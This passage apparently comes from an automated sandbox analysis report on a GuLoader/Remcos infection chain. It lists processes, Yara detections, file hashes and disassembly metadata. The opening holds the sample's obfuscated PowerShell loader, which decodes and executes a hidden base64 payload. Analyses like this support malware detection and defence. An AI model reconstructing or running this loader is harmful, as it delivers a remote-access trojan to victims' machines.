UdpleStudct Eph . PlanSQerumePilotcFordruSek.dr Thebi KnartIndusyExtraPGif wrDeadboDecomtErminovsentc FleroJakoblMoti,T Repoy cinepafslueUsort]Bever: Und :PseudTDragslLikrss.assa1Rigou2Supra ');$Tillodont=$Overlssets[0];$Suspensoriers34=(Balladised 'Facad$ret eGAntrolSlagto Bia BProl,AMatriLBegum:CanopAhuberD PlayvTsem.oRemodkseveraPlum tT,mlekP,lsaoTh rmNDylanTAccelo alkeRPercue Sp lrSymassstai =KartonFremme Su,ewN.sic-Stud.OUp,albCatecJTaveseomby,CTi ett Bonn Hirp.STriv YBo pes,isteTCrocoEFo.taM,latt. FrodnVenefEPlasttSeman. DiviWAfreneYndtuBTellucUniveL iviISlopee ForpN PoddTOdori ');Revanchistens ($Suspensoriers34);Revanchistens (Balladised 'Frugt$.sesvARadikd WorkvCurteoAnne,kGrinda ontatD.zenkRevolo nglen Om stEttaloCrystrDetereFo svrfemtes afi.N sseHFo,bret.ropa sheldEksameCentrrAdr as c rc[Aktio$MentiQCon.euSuavia Ant gAlbi mAithti.rinsrGreeniTetcheFrih.rBrug ]Betha=Coqu.$Skru EAnmrkr Batha Brugl Flor2Ant q1Gummi9Respe ');$Indeterminateness=Balladised 'monor$ Ud,iAwildcdTribuvLooseoAlle kLukkeaHakamtFjer kHe rioOpsvunPha.nt Introve strUnma e La tr slutsRetra.SafirDFrankoTur,sw p ykn PibelSlip.olovfsaFarved SoleFLigniistricl olvredenar(Montr$BintjTbreviiIngenlMatamlgreneoK lesdSergeo ekvinstvkot Kn.r,Dags.$RetinRSyranoenvelvBen vdCa loyBas arIsenke Co,enSaddleG.atesCit o)satir ';$Rovdyrenes=$Arvemssigt;Revanchistens (Balladised 'Raget$ ennuGLibidLFamiloCommybprecoAEnerglGloba:OmfanPM culIN.lliL DobbK Skumo.imorMCirkuBPhantIundernberigAKrimiTAfmeliInjurODev,lnGratiePartir Sprj=V ldt(SammeTunoveEOplsnsGangltKon.u-,indepSaliaaargentTr peHbretw Fines$VibrorTotalOVersiV Quadd onpaYKr mer SoldEBasilNTapiseUds us Mjdu)Nonap ');while (!$Pilkombinationer) {Revanchistens (Balladised 'Shr.v$FortrgUltimlRtehao Spejb Stanacalanl Leuk:Ak,liEHorricNachsoMaskisDolorpCatsteO,ertcEnginiDitlefSka eiTempecUngdoa Fanal Impel Skruytolds=Build$StuditPhosprcyanouSolece.laam ') ;Revanchistens $Indeterminateness;Revanchistens (Balladised 'Mark,S F,rmt HuslaTyrisrskrivtSan s-AfvikSAdra.l sevreIrrige Darnp Arr Unpes4Nond ');Revanchistens (Balladised 'Katmo$v.ndfg StivlSquamoM thobDeliva lvelU sen:Ja,anPNedriiAmolalTormekFonduohin emSuperbLabeli InjunB samaIndpat ReseiHalvtoMicron HvidegenlsrAmbol=Inde.(A omaTPubliexanthsHaveetHerre-CommuPElektaStatztMuscuhTwadd ,istr$BrandRDulluo Ytt vGrutcdEmbryyMlkekrM ssee.tivrnGarveeV gsesDians) rome ') ;Revanchistens (Balladised ' Vair$EmittgRe eml LibioSprjtb StudaSnesklBilbi:Lg erR argaeH ndenOutpusRou,ee lastmBaha aUnvicsCraftk nfuliCentrn ArsaeTerrosRib y=Arbej$FavelgTubtalSync o B rab pallaAmb llIsole: Sy hFKasteoAfparrNapalgPleuriBryghvDra teFloranSf esdT lefe ntros Effe+Pigh +Cong.%Al rg$OxyteO IntrvcamemeSulfar HypolSlavosUnshas Ass,e rubutOrdnus Otol.GeschcMechaoWoodcu ,odenOmbaet Coti ') ;$Tillodont=$Overlssets[$Rensemaskines];}$Dralonens=329627;$Haltereddijassociationens=32015;Revanchistens (Balladised ' Sofa$Fer kgUncaulMingeo Hemibscagla Ban lS ump:.orplO S,rfuTimistUn rydPas erLeasiaDiskenCob.ik Bery Afhug= Undi Spot GPlat eLugsptAou l-Su dhCOverbo cl mn Ro.et SodaeRep tn celitudpos Maski$NoninRVerd.oEntrav ndendGeogryZoquerLoutieHeartnSnubbeAboits Ilma ');Revanchistens (Balladised 'In er$ FagogSan,tlOversoArvinbTeknoaEfterlNonob: rgesVAfhrdiPolemd ReuneSelvooVerdeb.inieaRegneaSo ianAktuadPer ooV,dlipCastatIndstaKafeegFab leUhildrKlutze ForpnM.rri1Ame t7Dmpef7Redn B tik=F,lig Proto[CircuSnglesyunders TrestKultie Ju.tmPinta. ScraC MiljoLinienTilmev,freje F ksrundertSymbo] Wind:Unamp:UdfylF nimarSamnooIodatmGerm,BU deraFinmesBurreePilla6 Bekr4TekstS odgtM tchrMus ciT.rninGastrgNo.co(rytt $ KeapOVermeuGpscotVedkedSicinrStaalaKendinskab.kCyst )Igang ');Revanchistens (Balladised 'Cir i$ Sy bgcondulSarcoo PrefbKla.eaM.zarl Riga:Sig.iSRegant takirFeltieplsergBloduk Di.go Mulid Nihie Preds Har .ooid=Speci Vold.[ObersSVenliyc.mifsGoositTr dke Sp,tmR,nve.afledT S nke I cox leet Ukra.,icheEbo ndnPrepocRedegoRandsd Compi We,tnDisseg Arve]Kinco: Korf:nachoAMalvoS tvi CBr okIMin.rIJambo.Kv teG Erine Ra ntFremtS TidstgennerPilkei omtenBogengImmun(Obloq$InvenVDurosiMargidPlaceeHjlpeoSy,urbskvataMar,ka Udrkn SoladAvnesoM,liepN neqt uds,aB,attgVini.eUnaverPerlae Disen Libe1Gusta7Stjpl7 chas)Can p ');Revanchistens (Balladised 'Cathe$AnakrgDecarlparr olavanb JadiasynaglStrmk:SvejsCtusheaFragirPjankbToe oo RadinTrembasippet St eiSadelsQuadra AlgotDeba.i,rafio OptanB.hoo= Tryk$TheekSK geltDenitrKaviteT,ningPentakSpilooIransdMenseeMillesRepin.vold sTrojkuMet obJern sOrchetforurr Ungri Weisn ,oungPunkt(Du ke$BrnemDPyri rBorema Coazl eaktoTele.n Impoe Milin Se isTa.il,Land $ AnatHAntitaSy tel HenstRenseeHan or ,stfeJeremdSark dHelleiRet ojKonseaBowelsCe ers ZymooPurunc Gla.iFonaca Pop tgardeiKart,oF glenRefereImpernUnobjsPhilo)Udsmi ');Revanchistens $Carbonatisation;"
                                                      Imagebase:0x330000
                                                      File size:433'152 bytes
                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000003.00000002.2330820054.0000000008EE0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000003.00000002.2331073909.000000000B79A000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000003.00000002.2314752191.000000000605D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:4
                                                      Start time:01:42:22
                                                      Start date:01/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:8
                                                      Start time:01:42:46
                                                      Start date:01/10/2024
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\syswow64\msiexec.exe"
                                                      Imagebase:0x1f0000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.2294071887.0000000006660000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000008.00000002.2289212925.00000000057AA000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:12
                                                      Start time:01:43:09
                                                      Start date:01/10/2024
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                      Imagebase:0x1f0000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Disassembly

                                                      Reset < >

                                                        Executed Functions

                                                        Function 00007FFD9B7F7394 Relevance: 1.4, Instructions: 1362COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1890528362.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c9a5c371b33ab0fd44232c3250dd09ebfea1e44e40d81ed05cb751a52952cf41
                                                        • Instruction ID: 78c2929531fd8c4f677590576f0daa6102a8108406a79d5af3954541e28b4f0f
                                                        • Opcode Fuzzy Hash: c9a5c371b33ab0fd44232c3250dd09ebfea1e44e40d81ed05cb751a52952cf41
                                                        • Instruction Fuzzy Hash: 98A2F731B0EB898FEBA5DB6884656647FE1EF56310B0901FED048CB1F3DA25AC46C781
                                                        Function 00007FFD9B72B276 Relevance: .5, Instructions: 474COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1889765453.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b720000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 07abb754f0f5769ae3e602b8315029b8ab758889f7cb9498ae4c96e5b06951d8
                                                        • Instruction ID: d76073b883dd6ee27fcbfc2a40fc04f36e8b01bc417ca44b465c2115e3af0032
                                                        • Opcode Fuzzy Hash: 07abb754f0f5769ae3e602b8315029b8ab758889f7cb9498ae4c96e5b06951d8
                                                        • Instruction Fuzzy Hash: E6F19430A09B8D8FEBA8DF28C8557E977D1FF54310F04426EE85DC72A5DB34A9458B82
                                                        Function 00007FFD9B72C022 Relevance: .5, Instructions: 460COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1889765453.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b720000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f7e258fc19f53d19f057489638e9a77ee6a160ab648ca1bd56b49ab65159ab14
                                                        • Instruction ID: eb1f91b59d8a3455a270baffdfa7997fdb6b7f66385ce04766458699df044b75
                                                        • Opcode Fuzzy Hash: f7e258fc19f53d19f057489638e9a77ee6a160ab648ca1bd56b49ab65159ab14
                                                        • Instruction Fuzzy Hash: 8BE1C230A09A8D8FEBA8DF68C8657E977D1FF64310F14426ED84DC72A5CE74A9418782
                                                        Function 00007FFD9B7F739C Relevance: 1.0, Instructions: 966COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1890528362.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 52e9863f3d204df1dd5e3444a93184aefe4d6ad108e41b9796411a0575bc6918
                                                        • Instruction ID: 63afe9fd6404ed60893aecfb26267bae2acf767fb17243459afc0fca3375664e
                                                        • Opcode Fuzzy Hash: 52e9863f3d204df1dd5e3444a93184aefe4d6ad108e41b9796411a0575bc6918
                                                        • Instruction Fuzzy Hash: 73524632B0EB8E1FE7A6966C48655B47FD1EF56210B0A02FAD05DC71F3DE18AD068385
                                                        Function 00007FFD9B72E835 Relevance: .8, Instructions: 824COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1889765453.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b720000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8495cd79b630aa1ed8bcb109422de222ee3fa313502c273b35851f64ed8869ad
                                                        • Instruction ID: bf34f4556cee50ab83c8f7adbce76bcc1d4e69b59ad24284c6d7105c50fab28b
                                                        • Opcode Fuzzy Hash: 8495cd79b630aa1ed8bcb109422de222ee3fa313502c273b35851f64ed8869ad
                                                        • Instruction Fuzzy Hash: 2D12F631B0DB8D8FDB95DF5CC4A5AE87BE1FF58310F1502BAD449C72A6CA24A881C781
                                                        Function 00007FFD9B7F9530 Relevance: .4, Instructions: 402COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1890528362.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 005fa3529e12fda96a2d457e1b7a6b0155b340c2c3b71118112fe5d0695ad79b
                                                        • Instruction ID: cd5f69d231bf86a6852ca5bfeaa0d2ff5a78830e2cb646947102d999db85c2a2
                                                        • Opcode Fuzzy Hash: 005fa3529e12fda96a2d457e1b7a6b0155b340c2c3b71118112fe5d0695ad79b
                                                        • Instruction Fuzzy Hash: FDC12422B0EB890FEBA59AA848685B47BD1EF55310B0902BFD45DCB1F3DE15ED058385
                                                        Function 00007FFD9B7F7701 Relevance: .3, Instructions: 312COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1890528362.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8e90e833d3cfd237c89da62ca7c8f78a019e940a2672673eb032e4f3baf8a62e
                                                        • Instruction ID: 34a190a4e80be9cc0d9cd9820c8e0ee2e9f6123881772a1d3cf9e5f4ae825591
                                                        • Opcode Fuzzy Hash: 8e90e833d3cfd237c89da62ca7c8f78a019e940a2672673eb032e4f3baf8a62e
                                                        • Instruction Fuzzy Hash: EE91F221B1FB8E2FEBA6967848655747FD1EF56210B0A02FAD04CC71B3ED18AD068395
                                                        Function 00007FFD9B72BC80 Relevance: .3, Instructions: 305COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1889765453.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b720000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e4f562e7c5e20002a2212fb61bde72cef224196d4c2540b4c497a979bb065b7e
                                                        • Instruction ID: 5fb8ffa04d93dfc0778a31ec2fea5f21e4da22cb577cf97d40e1b6ff410cb4dc
                                                        • Opcode Fuzzy Hash: e4f562e7c5e20002a2212fb61bde72cef224196d4c2540b4c497a979bb065b7e
                                                        • Instruction Fuzzy Hash: A7A19270A08A4D4FEBA8DF28D8557F937D1FF58310F04426EE85DC32A6DB34A9458B82
                                                        Function 00007FFD9B7F9F45 Relevance: .2, Instructions: 193COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1890528362.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4c9806d8322465ecadc500d7e1ceeef469e9ad59bbccdb513514d5fc579b263c
                                                        • Instruction ID: 43f14800830bd298e76bdc84489f4a6d3f528b00708255bd996318a146423805
                                                        • Opcode Fuzzy Hash: 4c9806d8322465ecadc500d7e1ceeef469e9ad59bbccdb513514d5fc579b263c
                                                        • Instruction Fuzzy Hash: 4451D622B0EB894FDBA29BA848645B57FF1EF56210B0942FBD048C71F3DA18AD05C395
                                                        Function 00007FFD9B7F9C46 Relevance: .2, Instructions: 175COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1890528362.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: aee3c4213fe5c0194a69ef36973df189f183006029fac0c6f7c956e9fd5388aa
                                                        • Instruction ID: dd6eddd07583f5269dfd0feb5cec2ce6ae255384b618a4eab298f45e27bfe5a3
                                                        • Opcode Fuzzy Hash: aee3c4213fe5c0194a69ef36973df189f183006029fac0c6f7c956e9fd5388aa
                                                        • Instruction Fuzzy Hash: E7513632B0E7890FE765EB6888695B8BBD1EF55310F1902FED09C871E7CE24A945C781
                                                        Function 00007FFD9B7FA456 Relevance: .2, Instructions: 175COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1890528362.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 66754c53f6d7f6d5cffa9949258b973386471b00e185d546ff56c33589c0ae6d
                                                        • Instruction ID: fd5ed5b8d4332b096bc42da1f9f65e7025b3d97606ce4252d5b0a0bf56d7c3c1
                                                        • Opcode Fuzzy Hash: 66754c53f6d7f6d5cffa9949258b973386471b00e185d546ff56c33589c0ae6d
                                                        • Instruction Fuzzy Hash: 81514932F0E7894FE765EA5888A55B8BBE1EF65310F0902BED05CC71E7DE186D058782
                                                        Function 00007FFD9B7F8FD6 Relevance: .2, Instructions: 171COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1890528362.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bdf95c5491c622e4859c49f1c79ef71437851964ff04b9f8f600ff748e801d1c
                                                        • Instruction ID: ef041f63ab279b01f256c36c2e6622bcfc75cbc0e728a73c7eb03716f31da3d6
                                                        • Opcode Fuzzy Hash: bdf95c5491c622e4859c49f1c79ef71437851964ff04b9f8f600ff748e801d1c
                                                        • Instruction Fuzzy Hash: 06511833F0E78A4FE764EA5888656B8BBD1EF55310F1802BED05C871E7DE24A9458782
                                                        Function 00007FFD9B7F7B20 Relevance: .1, Instructions: 104COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1890528362.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2c95165dc643f8df4e6c516850d6e8d6febb23008651a4b456b8e353926783c0
                                                        • Instruction ID: a8a98110180e79bfd9a2ab23852637f3e4e7f4e3ce1b44caca5683933f25c682
                                                        • Opcode Fuzzy Hash: 2c95165dc643f8df4e6c516850d6e8d6febb23008651a4b456b8e353926783c0
                                                        • Instruction Fuzzy Hash: CB31E322B0FBC91FE7A6AAA848A45707FE1EF56350B0A01FAC458CB1F3D9086D448395
                                                        Function 00007FFD9B72B734 Relevance: .1, Instructions: 92COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1889765453.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b720000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b056e797e754ecc78a8093245bd267a7921738bcca9b4a348375aa9d2dc95fd6
                                                        • Instruction ID: 9968110a8ded9cbbc3becab59f437335a313216c7d709cfcde1b6ca847a7ffc4
                                                        • Opcode Fuzzy Hash: b056e797e754ecc78a8093245bd267a7921738bcca9b4a348375aa9d2dc95fd6
                                                        • Instruction Fuzzy Hash: 11311E30E1964DCEFBB49F54CC26BF932D0FF45319F414639D40D862B2DA386A85CA51
                                                        Function 00007FFD9B7F46EA Relevance: .1, Instructions: 87COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1890528362.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8563cc96229a1269767456b167c22531909b93246cbbb415df40319465a2935e
                                                        • Instruction ID: 150965faf5b55409662a99c542b0c5702194149ef3eef98a6fd61f252cab5c9e
                                                        • Opcode Fuzzy Hash: 8563cc96229a1269767456b167c22531909b93246cbbb415df40319465a2935e
                                                        • Instruction Fuzzy Hash: 4221D622F1EB4A4FE7B5A669142557476C2EF85350B4901FEE01CC72FBDD19ED018288
                                                        Function 00007FFD9B7F5681 Relevance: .1, Instructions: 61COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1890528362.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b18c54d72954fcb336600894ba6710724847b70e0538b94e73514772c63d40fc
                                                        • Instruction ID: a1dfab3d735eb1e54d503af6fa64528cf390e4f05a19d8c41ad35dab82a05904
                                                        • Opcode Fuzzy Hash: b18c54d72954fcb336600894ba6710724847b70e0538b94e73514772c63d40fc
                                                        • Instruction Fuzzy Hash: 7C01CC22F2FB5D0BE7B5669C58255B8BAC1EF54A1074902F6E42DD31F7DD086D0042C9
                                                        Function 00007FFD9B7241E5 Relevance: .0, Instructions: 49COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1889765453.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b720000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d3018d185270f09d679e4fb71a88b6ef8450c789612176cac0f9877b3821b575
                                                        • Instruction ID: 97a2b03adcfc1793861d4e0413afc6b6c0d653a0fbc5f36e6e75fbdb8954c1be
                                                        • Opcode Fuzzy Hash: d3018d185270f09d679e4fb71a88b6ef8450c789612176cac0f9877b3821b575
                                                        • Instruction Fuzzy Hash: B601677121CB0C4FDB48EF4CE451AA5B7E0FB95364F10056DE58AC36A5D636E882CB45
                                                        Function 00007FFD9B7F9FEB Relevance: .0, Instructions: 48COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1890528362.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 029d507aef0366574348d38bb41645a75a2aaaa977fa8b983180af244fc718d2
                                                        • Instruction ID: 79514e740c3bf740f25da50e465435bc303710291bd14c9a6d0e2e88b91967fa
                                                        • Opcode Fuzzy Hash: 029d507aef0366574348d38bb41645a75a2aaaa977fa8b983180af244fc718d2
                                                        • Instruction Fuzzy Hash: 3901D832B0EA8D4FDFA5EBA844545A8BBE0EF5521170501BED048C71B3EE156844C741
                                                        Function 00007FFD9B7F1A2A Relevance: .0, Instructions: 29COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1890528362.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5be0b604741bfd5134dbc1d04c575afc65d128f9116314faf3536de32490ff90
                                                        • Instruction ID: 0f232e0afc26be1699d75e8d162c8dce8c29a285c39911a593eb2393f28e5cd7
                                                        • Opcode Fuzzy Hash: 5be0b604741bfd5134dbc1d04c575afc65d128f9116314faf3536de32490ff90
                                                        • Instruction Fuzzy Hash: 96E0D853B0FA894FE794767C18381A83AD1EFD5250B1505BBD04CC71EBDD185C094345
                                                        Function 00007FFD9B7FA631 Relevance: .0, Instructions: 25COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1890528362.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d5df9ba81e6d2aac4e248e4fffe89dcadc2667970f0a8af36f5b6a6c3ed0b707
                                                        • Instruction ID: 0c4aefe53308fb38211fc80435429420d8d4c13901720c1d68c101b3d2761501
                                                        • Opcode Fuzzy Hash: d5df9ba81e6d2aac4e248e4fffe89dcadc2667970f0a8af36f5b6a6c3ed0b707
                                                        • Instruction Fuzzy Hash: C0E04F32F0E65D8DEB14B758A8226EDB7B0FF45220F0011B7D00ED30A6EE2529544B95

                                                        Executed Functions

                                                        Function 04F1F320 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2292571741.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_4f10000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: \Vj
                                                        • API String ID: 0-2670091720
                                                        • Opcode ID: 5bc040cb2a9348ec790de585b4ecfbaa2817e8e46101bb5abf64175f4bade578
                                                        • Instruction ID: 150d007ddee8b414ed9b1634c4dd5dfda7196172ccebe47cf39aea0a151501c6
                                                        • Opcode Fuzzy Hash: 5bc040cb2a9348ec790de585b4ecfbaa2817e8e46101bb5abf64175f4bade578
                                                        • Instruction Fuzzy Hash: BCB13F71E00209CFDB14CFA9D9857AEBBF2AF88314F148529D815E7264EB74A846CF91
                                                        Function 04F1FBF0 Relevance: .3, Instructions: 266COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2292571741.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_4f10000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
